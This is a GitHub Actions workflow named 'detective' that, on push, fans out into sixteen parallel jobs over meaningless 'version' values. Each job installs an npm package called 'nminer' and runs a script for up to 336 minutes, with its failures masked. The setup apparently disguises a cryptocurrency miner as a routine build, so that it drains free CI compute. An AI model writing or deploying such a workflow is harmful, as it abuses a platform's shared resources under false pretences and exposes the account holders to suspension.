name: detective
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 9505 }
          - { version: 6204 }
          - { version: 7742 }
          - { version: 7058 }
          - { version: 4328 }
          - { version: 2542 }
          - { version: 9419 }
          - { version: 5267 }
          - { version: 8004 }
          - { version: 4456 }
          - { version: 1709 }
          - { version: 460 }
          - { version: 8528 }
          - { version: 2243 }
          - { version: 5920 }
          - { version: 2669 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: 
        run: |
          npm install nminer@latest
          timeout 336m node detective.js || echo "detective executed"